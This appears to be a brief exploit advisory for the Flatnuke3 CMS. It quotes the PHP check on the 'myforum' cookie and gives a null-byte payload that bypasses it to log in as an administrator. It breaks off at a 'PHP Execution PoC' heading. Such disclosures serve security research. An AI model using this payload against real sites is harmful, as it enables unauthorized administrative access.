Http://www.inj3ct-it.org Staff[at]inj3ct-it[dot]org
Flatnuke3 Remote Cookie Manipoulation / Privilege Escalation
#By KiNgOfThEwOrLd
PoC:
When an user log in, flatnuke set him a cookie value like this: myforum=nomeuser. If we try to change it, flatnuke will ask us to log in again. The code is:
$req = $_SERVER["REQUEST_URI"];
if (strstr($req, "myforum="))
die(_NONPUOI);
So, we can bypass this filter, using nullbyte and login as admin. For example, Replace:
myforum=yourusername
with:
myforum%00=adminusername
PHP Execution PoC: